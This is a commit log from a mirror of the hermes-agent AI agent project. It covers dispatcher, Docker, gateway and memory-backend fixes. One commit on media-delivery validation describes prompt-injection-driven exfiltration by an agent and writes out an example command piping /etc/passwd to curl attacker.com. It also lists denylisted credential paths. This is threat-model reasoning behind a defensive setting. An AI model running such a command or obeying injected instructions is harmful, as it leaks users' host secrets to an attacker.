hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-05-30 06:41:51 +00:00

Author	SHA1	Message	Date
Teknium	3b6347af15	feat(kanban): default_assignee fallback + per-profile concurrency cap (#27145 , #21582 ) (#34244 ) Two related dispatcher behaviors that have been missing for a while. ## kanban.default_assignee (#27145) Reporter (@agarzon): dashboard creates a task without an assignee, task parks in 'ready' forever even though the operator's intent ('default') is perfectly clear. The dispatcher already had a 'skipped_unassigned' bucket but no fallback routing — users had to manually type 'default' in the assignee field every time. Behavior: when 'kanban.default_assignee' is set in config.yaml, the dispatcher applies that assignee to any unassigned ready task before deciding whether to spawn. The row is mutated (assignee column + an 'assigned' event with source='kanban.default_assignee' for the audit trail). Empty/whitespace config value = no fallback, preserving the existing skipped_unassigned behavior. Dry-run mode reports what WOULD happen via the new 'auto_assigned_default' bucket on DispatchResult, but does NOT mutate the DB — operators using 'hermes kanban dispatch --dry-run' see the routing decision before committing. ## kanban.max_in_progress_per_profile (#21582) Reporter (@edwardchenchen, @simlu, 4 reactions): fan-out workloads saturate one profile's local model / API quota / browser pool while other profiles sit idle. The existing global 'max_in_progress' caps total workers but doesn't balance across profiles. Behavior: when 'kanban.max_in_progress_per_profile' is set to a positive int, the dispatcher tracks per-assignee running counts (one query at tick start) and refuses to spawn for any assignee already at the cap. Tasks blocked this way go to a new 'skipped_per_profile_capped' bucket on DispatchResult as (task_id, assignee, current_running_count) tuples — NOT an operator-actionable failure, just 'try again next tick when the profile has capacity'. Pre-existing 'running' tasks count against the cap (verified via regression test). The cap respects dry_run mode by incrementing its in-memory counter on each would-be spawn so dry_run reports the same balanced subset that a real tick would. Invalid cap values (0, negative, non-int, None) are treated as 'no cap', preserving the existing behavior. Backward-compatible for installs that don't set the config. ## Surfaces - 'hermes kanban dispatch' CLI now prints 'Auto-assigned to kanban.default_assignee=X: ...' and 'Deferred (X at per-profile cap, N running): ...' lines, plus matching JSON keys in --json output. - Gateway dispatcher logs the configured values at startup ('default_assignee=X', 'max_in_progress_per_profile=N'). - 'kanban.max_in_progress_per_profile' added to DEFAULT_CONFIG with inline docs. ## Validation - tests/hermes_cli/test_kanban_default_assignee.py (6 cases): no-cap baseline, auto-assign + DB mutation, dry-run reports without mutating, whitespace treated as None, explicit assignees untouched, DispatchResult field schema. - tests/hermes_cli/test_kanban_per_profile_cap.py (9 cases including 4 parametrized): no-cap baseline, balanced 2-profile fan-out, pre-existing running counts against cap, invalid cap values (0/-1/'abc'/None), capped tasks dispatched on next tick after running task completes, DispatchResult field schema. - Broader kanban suite: 464/464 pass (was 449 baseline; +15 new regression tests across both features). ## Credit #27145 — Jimmy Johansson reported the dispatcher skipped-unassigned gap; @agarzon scoped the simpler 'honor kanban.default_assignee' fix that matches the existing config knob. #21582 — @edwardchenchen filed the per-profile cap ask after hitting model 429s on fan-out research projects; @simlu confirmed the same pain on local-model setups.	2026-05-28 19:02:55 -07:00
Ben	d77d877665	fix(docker): startup orphan reaper for crashed-process containers The cleanup-fix in the previous commit handles the graceful-exit leak: a Hermes process that runs ``atexit`` will now actually wait on the docker stop/rm worker thread, so containers either survive (persist mode) or are fully removed (opt-out mode) by the time the interpreter exits. But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window close. Containers from those exits stay parked with no surviving Python process to reuse or remove them, so they accumulate until the operator intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class — there's no live cleanup() to fix. This commit adds the safety net: a startup orphan reaper that runs once per Hermes process and removes long-Exited hermes-labeled containers that the prior commit couldn't reach. Implementation: * New ``reap_orphan_containers()`` in ``tools/environments/docker.py``. Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional) ``label=hermes-profile=<current>``. Per-container ``docker inspect`` parses ``State.FinishedAt`` (with nanosecond-precision trimming for Python's microsecond-bound ``fromisoformat``); containers older than the threshold get ``docker rm -f``'d. The ``status=exited`` filter is load-bearing — a running container may belong to a sibling Hermes process whose reuse path will pick it up; killing it would crash the sibling mid-command. Single-container failures are logged and the sweep continues to the next candidate. * New ``_maybe_reap_docker_orphans()`` helper in ``tools/terminal_tool.py``. Wired into ``_create_environment()`` for ``env_type == "docker"``. Gated by: - ``terminal.docker_orphan_reaper: true`` (default; opt-out for operators running multiple Hermes processes in the same profile who don't trust the conservative defaults) - ``_docker_orphan_reaper_ran`` module flag with double-checked locking — parallel subagents and RL rollouts don't trigger N concurrent docker ps storms - Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor (so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own setup) - Profile scoping — a research profile NEVER reaps the default profile's stragglers - Exception swallow — a janitor failure must never block container creation * New config ``terminal.docker_orphan_reaper`` wired through all four config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py, tests/conftest.py) and pinned by ``test_docker_orphan_reaper_is_bridged_everywhere``. Coverage: * 9 new unit tests in test_docker_environment.py — happy path, recent- container sparing, profile scoping, unparseable-timestamp safety, docker-ps-failure handling, partial-failure continuation, nanosecond timestamp parsing, zero-value FinishedAt rejection. * 6 new integration tests in test_docker_orphan_reaper_integration.py — once-per-process gate, disable-flag respected, lifetime doubling with 60s floor, current-profile filter wiring, exception swallow. * 1 new bridge-invariant regression test. Closes #20561 (combined with the two prior commits on this branch).	2026-05-29 11:49:54 +10:00
Ben	ac8e238bc8	fix(docker): reuse containers across processes + fix cleanup leaks The Docker backend docs claim "Single persistent container — ONE long- lived container shared across sessions, /new, /reset, and delegate_task subagents. Stopped/removed on shutdown." In practice the code only honored that contract within a single Python process via the in-memory \`_active_environments[task_id]\` cache. Every \`hermes chat\` invocation spawned a fresh \`hermes-<hex>\` container; older containers piled up in \`Exited\` state and accumulated until manual \`docker rm\` (issue #20561). Three root causes, all addressed by this commit: 1. No cross-process container discovery. 2. \`cleanup()\` used fire-and-forget \`subprocess.Popen("... &", shell=True)\` which raced with parent-process exit — when Python exited promptly the detached shell child got killed mid-\`docker stop\`, leaving stopped containers behind. 3. The \`docker rm\` step in cleanup was gated on \`not self._persistent\` (the bind-mount-persistence flag). Default config sets \`container_persistent: true\`, so the default happy path skipped \`rm\` entirely — even when the user explicitly didn't want cross-process reuse, containers leaked. Fix: * Add \`DockerEnvironment.__init__(persist_across_processes=True)\`. When true, init probes \`docker ps -a --filter label=hermes-agent=1 --filter label=hermes-task-id=<task> --filter label=hermes-profile=<profile>\` and reuses a matching container (running → attach; stopped → \`docker start\` → attach; \`docker start\` failure → fall through to a fresh \`docker run\`). Multiple matches prefer the running one, with the stragglers left for the orphan reaper (next commit) to clean up. * Rewrite \`cleanup()\`. Uses \`subprocess.run(..., timeout=30)\` on a daemon \`threading.Thread\`, not the racy \`Popen(... &)\`. The \`_persistent\` guard is dropped on the \`rm\` step — \`rm\` now runs whenever \`persist_across_processes\` is false, regardless of the bind-mount-persistence setting. The leak class is gone in all combinations. * Add \`wait_for_cleanup(timeout)\`. \`tools/terminal_tool.py\`'s atexit hook calls this on every active env, blocking up to 15s for the cleanup thread before interpreter exit. Without this, \`hermes /quit\` raced the daemon-thread teardown and dropped the stop/rm work. * New config \`terminal.docker_persist_across_processes\` (default \`true\` — restores the documented contract). Set \`false\` for hard per-process isolation. Wired through all four config-bridge sites (cli.py env_mappings, gateway/run.py _terminal_env_map, hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip list); regression-pinned by \`test_docker_persist_across_processes_is_bridged_everywhere\` matching the existing pattern for docker_run_as_host_user / docker_env. Reuse intentionally does NOT compare image / mounts / resources — only the labels. Operators changing those settings should set \`docker_persist_across_processes: false\` (or \`docker rm -f\` the labeled container) to force a fresh start. This keeps the probe cheap and the failure mode obvious. Coverage: 12 new unit tests in tests/tools/test_docker_environment.py covering reuse paths (running, stopped, fallback, opt-out, duplicate preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm, no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one config-bridge regression pin. Refs #20561	2026-05-29 11:49:54 +10:00
Teknium	3a9bc9d88a	fix(model picker): unify /model and `hermes model` lists, add disk cache (#33867 ) * fix(model picker): unify /model and `hermes model` model lists, add disk cache The /model slash picker and `hermes model` were drifting apart. /model read the raw static `OPENROUTER_MODELS` list (31 entries, including 5 that fail at runtime — no tool-call support or absent from live catalog), while `hermes model` ran the same list through the live OpenRouter /v1/models tool-support filter and showed 26 valid entries. Same problem existed for every other authed provider: /model used curated static lists, `hermes model` used live /v1/models. Unifies both surfaces on `provider_model_ids()` and adds a generic disk-cached wrapper so the picker stays snappy. Changes - hermes_cli/models.py: new `cached_provider_model_ids()` — ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries keyed by credential fingerprint (env vars + OAuth file mtimes). Stale-data-beats-no-data on transient failures. Pair with `clear_provider_models_cache(provider=None)`. - hermes_cli/models.py: `provider_model_ids("nous")` now falls back to the docs-hosted manifest (not the in-repo snapshot) when the live Portal /models call fails — preserves the model_catalog regression guarantee while still going through the unified pathway. - hermes_cli/model_switch.py: `list_authenticated_providers` routes sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with curated fallback when the live fetcher comes up empty. - hermes_cli/model_switch.py: `parse_model_flags` extended to a 4-tuple, parses `--refresh`. - cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking; CLI + gateway wire `--refresh` to `clear_provider_models_cache()`. - hermes_cli/main.py: `hermes model --refresh` argparse flag. - hermes_cli/commands.py: `/model` args_hint advertises `--refresh`. - tests/hermes_cli/test_inventory.py: refresh stale comment. Live PTY parity verification - /model → OpenRouter row: `(26 models)` (was 31, with broken entries) - `hermes model` → OpenRouter: 26 models (unchanged) - The 5 dropped entries: `pareto-code` (no tool-call support), `gemini-3-pro-image-preview` (no tool-call support), `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone from OpenRouter's live catalog). Live PTY timing - First /model open, empty cache: 4624 ms (full network round trip across every authed provider) - Second /model open, warm cache: 51 ms (90× faster) - `/model --refresh` clears the disk cache and re-fetches. Cache schema (~/.hermes/provider_models_cache.json, ~3 KB): { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]}, ... } Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway — 5855/5855 pass. * fix(model picker): use blake2b for cache fingerprint to silence CodeQL py/weak-sensitive-data-hashing flagged the sha256 call in _credential_fingerprint() as a high-severity alert because the input includes env var values whose names contain _API_KEY / _TOKEN. The hash is used solely as a cache-bust identity — never reversed, never stored, collisions are harmless (worst case: cache miss → live re-fetch). blake2b serves the same purpose and isn't flagged by this rule. Functional behavior identical: 16-hex-char digest, cache hit/miss logic unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.	2026-05-28 11:33:16 -07:00
Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
Teknium	10ee4a729b	fix(gateway): drain on Windows `hermes gateway stop` so sessions survive restart (#33798 ) Sessions now survive `hermes gateway stop` / `restart` on native Windows. Previously the gateway died on schtasks `/End` + os.kill SIGTERM without ever running the drain loop, so the v0.13.0 session-resume feature (#21192) silently broke on Windows: `resume_pending=True` was never written, and the next boot started with a blank conversation history (issue #33778). Root cause is twofold and the reporter only identified half of it: 1. `hermes_cli/gateway_windows.py::stop()` did not write the `planned_stop_marker` before signalling. The reporter caught this. 2. The bigger reason: `asyncio.add_signal_handler` raises NotImplementedError for SIGTERM/SIGINT on Windows, so even if the marker had been written, the gateway's existing SIGTERM handler (which is what calls `runner.stop()` and the `mark_resume_pending` loop) was never invoked. Writing the marker would have been necessary-but-insufficient. The fix has two parts: * gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls for the planned-stop marker file every 0.5s. When the marker appears it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the same shutdown path a real SIGTERM would have driven, including the pre-drain `mark_resume_pending` writes (run.py:5977) and graceful drain wait. The existing signal handler already accepts `received_signal=None` and falls through to `consume_planned_stop_marker_for_self()`, so no handler changes needed. Runs on every platform as cheap belt-and-suspenders. * hermes_cli/gateway_windows.py: `stop()` now writes the marker for the running gateway PID and waits up to `agent.restart_drain_timeout` (default 30s) for the PID to exit cleanly. On clean drain, the kill sweep is non-forceful; on timeout, escalates to `kill_gateway_processes(force=True)` which routes to taskkill /T /F per `references/windows-native-support.md`. Validation: * 7 new tests in tests/gateway/test_planned_stop_watcher.py covering: marker→handler dispatch, no-marker idle, already-draining skip, not-yet-running skip, stop_event responsiveness, fire-once semantics, error tolerance. * 8 new tests in tests/hermes_cli/test_gateway_windows.py covering: marker-before-kill ordering, clean-drain skips force-kill, drain-timeout escalates to force=True, no-pid-skips-drain, invalid-pid handling, fast-exit success, timeout failure, marker-write-failure tolerance. * E2E (Linux, detached orphan): write_planned_stop_marker(pid) + `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the victim sees the marker and exits. Tested with a double-forked subprocess so the test parent isn't holding it as a zombie. * Targeted: tests/gateway/{restart_drain,restart_resume_pending, signal,signal_format,status,shutdown_forensics,approve_deny_commands, planned_stop_watcher} + tests/hermes_cli/{gateway_windows, gateway_service} → 519/519. What was wrong with the reporter's claim (for future archaeology): they described the symptom as "no `resume_pending=True` written to `sessions.json`" — but Hermes uses `state.db` (SQLite), not `sessions.json`, and `mark_resume_pending` is called regardless of the marker (the marker only affects exit code 0 vs 1 for systemd revival semantics). The real session-loss path is the missing drain on Windows, not a missing marker. Both halves are fixed here. Closes #33778.	2026-05-28 03:25:32 -07:00
Indigo Karasu	9179396cb7	fix(stream-consumer): only set _final_content_delivered when final response confirmed delivered In GatewayStreamConsumer._run(), _final_content_delivered was set to True based on the success of a mid-stream finalize edit, before the final finalize edit was attempted. When the final edit later failed (Telegram flood control, retry-after), _final_response_sent stayed False but _final_content_delivered was already True, so gateway/run.py suppressed its normal final send and the user saw a partial / fallback message instead of the real answer. Changes in gateway/stream_consumer.py: - Remove the premature _final_content_delivered = True at the top of the got_done block. - Set _final_content_delivered = True only when the actual final send / edit succeeds, in each finalize branch (no-finalize adapter, _message_id finalize, no-_already_sent send). - _send_fallback_final: don't set _final_response_sent = True when only some chunks were delivered; the gateway should still attempt a complete final send. Set _final_content_delivered = True alongside _final_response_sent on the success path and short-text path. - Cancellation handler: set _final_content_delivered = True alongside _final_response_sent when the best-effort final edit succeeds. Adds TestFinalContentDeliveredGuard with 3 regression tests covering the core bug scenario, the happy path, and partial fallback. Closes #33708 Closes #25010 Refs #29200 Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>	2026-05-28 03:15:19 -07:00
Dusk1e	43abc51f66	fix(security): require source CIDR allowlisting for public msgraph webhook binds	2026-05-28 01:26:18 -07:00
Dusk1e	1a9ef83147	fix(security): require API_SERVER_KEY before dispatching API server work	2026-05-28 00:25:08 -07:00
Brian D. Evans	3ad46933d3	docs(voice): use `uv pip install faster-whisper` in STT install hints (#29800 ) * docs(voice): use `uv pip install faster-whisper` in STT install hints Three runtime messages told users to `pip install faster-whisper` (reported in #29782 for the gateway STT failure message under Telegram-in-Docker, where the user hit `bash: pip: command not found`). The Hermes Docker image is built on `ghcr.io/astral-sh/uv` with a uv-managed venv that doesn't ship `pip` on PATH; users on modern `uv tool install` / `uv venv` installs see the same problem. The canonical install command in this repo is `uv pip install` (see `tools/lazy_deps.py:509` `feature_install_command()`), which works in Docker (uv image), in `uv tool install` venvs, and in pip-based venvs that already have uv on PATH. Changed three locations to match: - `gateway/run.py` — Telegram/Discord/Slack/WhatsApp/etc. voice reply when no STT provider is configured. Suggests `uv pip install faster-whisper` and notes that `pip install faster-whisper` also works if `pip` is on PATH. - `tools/voice_mode.py` — `/voice` status line for missing STT. - `cli.py` — Voice-mode startup error, "Option 1". No behavior change beyond the user-facing text. No production code path was touched. * docs(voice): add pip fallback to cli + voice_mode STT hints Copilot flagged that cli.py and tools/voice_mode.py recommend `uv pip install faster-whisper` without a fallback for environments where uv isn't on PATH. The gateway/run.py message already lists `pip install faster-whisper` as an alternative; this commit aligns the two remaining call sites to match. Addresses inline Copilot review on #29800. --------- Co-authored-by: briandevans <252620095+briandevans@users.noreply.github.com>	2026-05-28 16:23:14 +10:00
Stephen Chin	ffdc937c18	fix(kanban): hoist zombie reaper out of dispatch_once Reaper now runs at the top of every dispatcher tick regardless of per-board connect() failures. Previously the reaper sat inside dispatch_once after the kanban_db.connect() call — any EIO during connect would skip reaping for that tick, accumulating zombie workers and stale claim_lock rows. Also: reap_worker_zombies now returns the list of reaped pids (the dispatcher logs them) and a test indentation fix. Squashes three sibling commits from PR #32301 into one logical change for batch review.	2026-05-27 14:31:55 -07:00
Donovan Yohan	c94ad89818	fix(kanban): retry corrupt-board dispatch after quarantine	2026-05-27 11:48:23 -07:00
Erosika	1a8e67076a	fix(honcho): cover pinUserPeer + aiPeer edge cases in setup, clone, and gateway cache Three related regressions stemming from the pinUserPeer alias landing: - Setup wizard read host-only fields when detecting current shape but the parser supports root-level config and gives host pinUserPeer higher precedence than pinPeerName. Re-running setup could mis-detect shape and silently flip routing. Detection now uses the same resolver order as HonchoClientConfig, and each shape branch scrubs every peer-mapping key before writing so a stale pinUserPeer=false can't outrank a freshly written pinPeerName=true. Multi no longer auto-writes userPeerAliases={} (was silently masking root-level baselines). - clone_honcho_for_profile inherited pinPeerName but not pinUserPeer, so a default profile configured with the newer key produced cloned profiles without the pin. - Gateway cache-busting signature fingerprinted Honcho user-peer fields but not ai_peer. Since HonchoSessionManager freezes cfg.ai_peer at init, mid-flight aiPeer edits kept assistant writes on the old peer until an unrelated cache eviction. ai_peer is now part of the signature.	2026-05-27 10:49:33 -07:00
Erosika	6feb2afd50	fix(honcho): plug pinPeerName transition gaps Three correctness gaps when honcho.json's identity-mapping config changes mid-flight: 1. The gateway's agent cache signature ignored honcho identity keys, so editing peerName / pinPeerName / userPeerAliases / runtimePeerPrefix was silently dropped until an unrelated cache eviction. Extend _extract_cache_busting_config to fingerprint the resolved honcho config so the AIAgent rebuilds on the next message. 2. cmd_setup let single → multi flips orphan the pinned-pool history under peerName without warning. Detect the transition, warn that runtime users will resolve to fresh empty peers, and auto-steer to hybrid (alias the operator's runtime IDs back to peerName) so the operator's own continuity survives. yes / no overrides available. 3. README didn't document the orphaning behaviour. Add a "Migrating single → multi" callout under Deployment shapes. Tests: - TestPinTransition (test_pin_peer_name.py): fresh-manager flip resolves to runtime, in-process flip is gated by the per-key session cache (documents the gateway-cache-must-bust contract), 3 cache-bust signature tests for pin / aliases / prefix. - TestProfilePeerUniqueness: two profiles pinned to distinct peerNames resolve to distinct peers; host-level peerName overrides root when pinned. - test_single_to_multi_steers_to_hybrid_by_default and test_single_to_multi_yes_override_keeps_multi (test_cli.py): wizard guard end-to-end coverage.	2026-05-27 10:49:33 -07:00
erosika	c03960decd	fix(honcho): include user_id in agent cache signature to prevent shared-thread peer contamination PR #27371 introduced a per-user-peer resolver in HonchoSessionManager, but the resolved runtime identity is frozen into the manager at first- message init. When the gateway session_key intentionally omits the participant ID (the default for threads via thread_sessions_per_user= False), a cached AIAgent created by user A is reused for user B's messages, attributing B's writes to A's resolved Honcho peer and breaking #27371's per-user-peer contract. Fix by including user_id and user_id_alt in _agent_config_signature so the cache key distinguishes participants in shared threads. Each user in a shared thread now triggers a fresh AIAgent build (trading prompt- cache warmth for memory-attribution correctness — the right tradeoff for an external-memory backend where misattribution is unrecoverable). The default-None case keeps the signature byte-identical to pre-fix behavior so this change doesn't invalidate in-flight caches on deploy.	2026-05-27 10:49:33 -07:00
mavrickdeveloper	2e3c6627ce	Add Honcho runtime peer mapping (cherry picked from commit `864cdb3d2e`)	2026-05-27 10:49:33 -07:00
Teknium	0325e18f34	fix(gateway): keep Telegram heartbeat + interim commentary on; edit heartbeat in place (#33187 ) #33151 flipped THREE Telegram display defaults to false: - tool_progress: new -> off (kept: per-tool stream is too chatty) - interim_assistant_messages: T -> F (REVERTED here) - long_running_notifications: T -> F (REVERTED here) - busy_ack_detail: T -> F (kept: verbose iteration counter) The two reverts were wrong. interim_assistant_messages = the model's REAL words mid-turn ("I'll inspect the repo first.", "Let me check both files in parallel"). That is signal, not noise. Suppressing it left Telegram users staring at "typing..." for the entire turn duration with no feedback. long_running_notifications = the periodic heartbeat. Silent agent for 30 minutes is worse than one bubble updating every 3 minutes. Changes: - gateway/display_config.py: Telegram tier-1 inbox keeps both defaults on (only tool_progress and busy_ack_detail stay off). - gateway/run.py _notify_long_running(): edit a single heartbeat message in place (where the adapter supports it) instead of posting a new "Still working..." bubble each interval. Telegram, Discord, Slack, Matrix all qualify. Falls back to send-new when edit fails. - gateway/run.py: tighten heartbeat text. "⏳ Still working... (12 min elapsed — iteration 21/60, running: terminal)" -> "⏳ Working — 12 min, terminal". Verbose iteration detail moves behind busy_ack_detail (one knob now controls both busy acks AND heartbeat verbosity). - tests/, cli-config.yaml.example, website/docs/user-guide/messaging: updated to reflect the corrected story.	2026-05-27 05:21:53 -07:00
konsisumer	f1422ffd77	fix(gateway): classify Codex 429 quota as rate-limit, not missing credentials When the Codex OAuth token endpoint returns 429 (usage-limit / quota exhaustion), refresh_codex_oauth_pure raised a generic auth error that the gateway surfaced as 'Primary provider auth failed: No Codex credentials stored. Run hermes auth', prompting re-auth that cannot lift a quota cap. Classify 429 distinctly (codex_rate_limited, relogin_required=False) with a non-alarming quota message that honors Retry-After, log it as 'Primary provider rate-limited (429)', and stop format_auth_error from appending the re-authenticate remediation. Also log the fallback provider's literal config key instead of the resolved runtime category. Refs #32790	2026-05-27 03:13:15 -07:00
Teknium	2f7ba51b80	refactor(gateway): drop try/except wrappers around resolve_display_setting The two new display-resolution sites added by #31034 (busy_ack_detail and long_running_notifications) wrapped resolve_display_setting() in try/except Exception. The existing 4 call sites in this file don't — the function is safe by contract. Match the established pattern and drop the redundant guards. -16 LOC, no behaviour change.	2026-05-27 02:41:24 -07:00
houenyang-momo	60f84c6c28	gateway: quiet Telegram operational chatter	2026-05-27 02:41:24 -07:00
Robert DaSilva	efa952531b	fix: ignore Telegram start pings	2026-05-27 02:41:24 -07:00
sir-ad	8807b1c727	fix(gateway): hide telegram compaction status noise	2026-05-27 02:41:24 -07:00
Teknium	96223265b9	chore(api-server): mark skills_api capability True now that /v1/skills shipped #33016 added GET /v1/skills + /v1/toolsets on the API server; the capability flag introduced in this branch was placeholder-False. Flip to True so capability probers see the truth.	2026-05-27 01:56:55 -07:00
Jonathan	464b51d455	Support media in session chat API	2026-05-27 01:56:55 -07:00
Bailey Dixon	f7527b0fdb	feat: add API server session controls	2026-05-27 01:56:55 -07:00
Teknium	25f43d38de	feat(api-server): add GET /v1/skills and /v1/toolsets (#33016 ) Lets external clients enumerate the agent's skills and resolved toolsets deterministically over the OpenAI-compatible API server, without standing up the dashboard web server or sending a chat message and asking the model to list them. - GET /v1/skills — list installed skills (name, description, category) - GET /v1/toolsets — list toolsets resolved for the api_server platform, with enabled/configured state and the concrete tool names each expands to - Both gated by API_SERVER_KEY (same Bearer scheme as every other /v1/* endpoint) - /v1/capabilities advertises both new endpoints Closes the gap a community user just hit asking how to list skills over REST when only the OpenAI-compatible server is running. Test plan - python -m pytest tests/gateway/test_api_server.py -k "Skills or Toolsets or Capabilities" -o 'addopts=' -q → 9/9 pass - python -m pytest tests/gateway/test_api_server.py -o 'addopts=' -q → 156/156 pass, no regressions - E2E: started a real adapter on an isolated HERMES_HOME with a fake skill installed; curl-equivalent calls to /v1/capabilities, /v1/skills, /v1/toolsets returned the expected JSON; unauthenticated calls returned 401 with the configured API_SERVER_KEY.	2026-05-27 01:27:26 -07:00
Teknium	febc4cfec0	remove Vercel AI Gateway and Vercel Sandbox (#33067 ) * remove Vercel AI Gateway provider and Vercel Sandbox terminal backend Both Vercel-hosted integrations are removed end-to-end. Users on the AI Gateway should switch to OpenRouter or one of the other aggregators (Nous Portal, Kilo Code). Users on the Vercel Sandbox backend should switch to Docker, Modal, Daytona, or SSH. What's removed: - `plugins/model-providers/ai-gateway/` provider plugin - `hermes_cli/vercel_auth.py` Vercel-Sandbox auth helper - `tools/environments/vercel_sandbox.py` terminal backend - `ai-gateway` provider wiring across auth, doctor, setup, models, config, status, providers, main, web_server, model_normalize, dump - `vercel_sandbox` backend wiring across terminal_tool, file_tools, code_execution_tool, file_operations, approval, skills_tool, environments/local, credential_files, lazy_deps, prompt_builder, cli, gateway/run - `AI_GATEWAY_BASE_URL` constant, `_AI_GATEWAY_HEADERS` auxiliary-client header set, run_agent base-URL header/reasoning special-cases - `[vercel]` pyproject extra and `vercel`/`vercel-workers` from uv.lock - env vars: `AI_GATEWAY_API_KEY`, `AI_GATEWAY_BASE_URL`, `VERCEL_TOKEN`, `VERCEL_PROJECT_ID`, `VERCEL_TEAM_ID`, `VERCEL_OIDC_TOKEN`, `TERMINAL_VERCEL_RUNTIME` - Tests: deletes test_ai_gateway_models.py and test_vercel_sandbox_environment.py; scrubs references across 23 surviving test files (no entire tests deleted unless they were dedicated to AI Gateway / Sandbox) - Docs: provider tables, env-var reference, setup guides, security notes, tool config, terminal-backend tables — English plus zh-Hans i18n parity - `hermes-agent` skill: provider table entry and remote-backend list What stays (intentional): - `popular-web-designs/templates/vercel.md` — CSS design reference, unrelated to Vercel-the-AI-product - `x-vercel-id` in `stream_diag.py` headers — generic Vercel CDN response header, useful diag signal on any Vercel-hosted endpoint - `vercel-labs/agent-browser` URL in browser config — lightpanda browser project, different OSS effort - `userStories.json` historical contributor entry mentioning Vercel Sandbox — archive, not active docs Validation: - 1153 tests in the 22 targeted files pass (`scripts/run_tests.sh`) - Full repo `py_compile` clean - Live import of every touched module + invariant check (no `ai-gateway` in `PROVIDER_REGISTRY`, no `_AI_GATEWAY_HEADERS`, no `vercel_sandbox` in `_REMOTE_TERMINAL_BACKENDS`) * test: convert profile-count check from change-detector to invariant The hardcoded "== 34" assertion broke when ai-gateway was removed. Per AGENTS.md change-detector-test guidance, assert the relationship (registry count >= number of plugin dirs) instead of a literal count. Counts shift when providers are added/removed; that's expected.	2026-05-27 00:43:32 -07:00
teknium1	f05a47309e	fix(gateway): refresh cached agent tools on /reload-mcp When the gateway processes /reload-mcp, it reconnects MCP servers and updates the global _servers registry, but cached AIAgent instances in _agent_cache keep the tools list they were built with. The user had to also run /new (discarding conversation history) before the agent could see the new tools — even though /reload-mcp had succeeded. This patch refreshes each cached agent's .tools and .valid_tool_names in _execute_mcp_reload after discovery returns, so existing sessions pick up new MCP tools on their next turn. The slash-confirm gate in _handle_reload_mcp_command already obtains user consent for the implied prompt-cache invalidation before this code runs. Mirrors the equivalent behaviour the CLI already does in cli.py _reload_mcp. Per-agent enabled_toolsets and disabled_toolsets are preserved so an agent that was scoped to a subset of toolsets does not silently gain disabled tools after the reload. Original diagnosis + initial implementation in #23812 from @fujinice. The auto-reload watcher half of that PR is intentionally dropped — users want /reload-mcp to remain explicit. Co-authored-by: fujinice <45688690+fujinice@users.noreply.github.com>	2026-05-26 14:28:51 -07:00
